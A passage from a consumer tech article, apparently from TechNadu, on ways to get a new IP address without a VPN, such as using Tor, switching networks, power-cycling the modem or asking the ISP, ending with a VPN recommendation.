Keep in mind that routing your traffic through so many relays will negatively impact your browsing speeds. This makes Tor a poor option for streaming and other network-intensive activities. Light browsing is perfectly fine, however.

Simply hopping onto a different network than the one youre currently using will provide you with a new IP address. For example, switching to mobile data on your smartphone or using public Wi-Fi instead of your home network.

Obviously, this isnt an ideal solution, and using public Wi-Fi can be dangerous in itself. You can use it to get around an unfair IP block in a pinch, though.

If your ISP uses dynamic IP addresses (DHCP), unplugging your modem for a few hours will assign your IP to another user on their network. When you plug the modem back in, theres a chance you will gain a new IP address.

We say a chance because theres no guarantee of success. If you really need to change your IP address without a VPN and the methods above arent effective, you might as well ask your ISP to do it themselves.

A majority of ISPs nowadays dynamically assign IP addresses to home users, so the modem method should work in most cases. If not, then give your ISP a call and explain why you want to change your IP address. Youll need a decent reason for it, though (getting banned on 4chan probably isnt going to cut it).

In the end, using a decent VPN (such as ExpressVPN) to change your IP address is still your best bet.

Link:
How to Change IP Address Without VPN - TechNadu